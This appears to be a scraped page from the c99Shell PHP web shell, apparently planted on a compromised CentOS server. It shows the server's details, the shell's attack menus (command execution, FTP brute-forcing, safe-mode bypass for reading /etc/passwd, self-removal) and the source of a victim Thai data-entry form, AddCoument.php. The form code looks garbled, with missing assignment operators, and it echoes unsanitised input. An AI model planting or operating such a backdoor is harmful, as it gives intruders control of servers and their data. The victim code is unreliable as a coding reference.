!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/manage/manage_depart/   drwxr-xr-x
Free 52.81 GB of 127.8 GB (41.33%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     AddCoument.php (2.19 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
include("../include/FunctionDB.php");
$msg "&nbsp;";
$reload "";
    if ( !empty($Docom_name) )
        {
            $Docom_name ereg_replace ("\"","&quot;" ,"$Docom_name");
            ConnectDB();
            InsertDocontion($Docom_name);
            $msg "<font color=\"#FF0000\"><strong> เพิ่มข้อมูล '<font color=\#0000FF\">$Docom_name</font>' COMPLETE</Strong></font> ";
            $reload "<script language=\"JavaScript\">\n";
            $reload $reload."parent.frames.nav.location.reload();\n";
            $reload $reload."</script>";
            echo"<meta http-equiv=\"refresh\"content=\"2;URL=AddCoument.php\">\n"
            CloseDB();
        }
        else {
        
        $msg "<font color=\"#FF0000\"><strong>ยังไม่ได้กรอกข้อมูลแหล่งเงิน </Strong></font> ";
        
        }
    ?>
<html>
<head> 
<title> เพิ่มข้อมูลแหล่งเงิน</title>
<meta http-equiv="Content-Type"content="text/html; charset=windows-874">
<link href="../css/style1.css" rel="stylesheet" type="text/css">
<head>
<body bgcolor="#FFFFFF">
<? $reload?>
<div align="center">
<b><? $msg ?></b>

  <table width="92%" border="0" cellspacing="1" cellpadding="0" align="center">
    <form method="post" action="<? echo  $PHP_SELF ?>">
      <tr align="center" bgcolor="#006699"> 
        <td colspan="3" class="Tahoma8"> <b><font color="#FFFFFF" size="4" face="Tahoma">เพิ่มหมวดข้อมูล</font></b>        </td>
      </tr>
      <tr> 
        <td width="132"  align=\"right\" bgcolor="#dddddd"><div align="center"><font size="2" face="Tahoma">ชื่อหมวดข้อมูล</font></div></td>
        <td width="23"    bgcolor="#dddddd"><font face="Tahoma">&nbsp;<font color="#FF0000" size="3"><strong>*</strong></font></font></td>
        <td width="455"     bgcolor="#dddddd"><font face="Tahoma"> 
          <input name="Docom_name" type="text" id="Docom_name" title="Docom_name" size="50">
        </font></td>
      </tr>
      <tr bgcolor="#006699"> 
        <td colspan="3"    align="right"> 
          <div align="center"><font face="Tahoma"> 
            <input type="submit" name="Submit" value="  เพิ่มข้อมูล ">
            </font>
             <input type="button" name="close2" value="ปิดหน้าต่าง" onClick="window.close()" />
          </div></td>
      </tr>
    </form>
  </table>
</div>
    </body>
    </html>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd
Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 
:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0179 ]--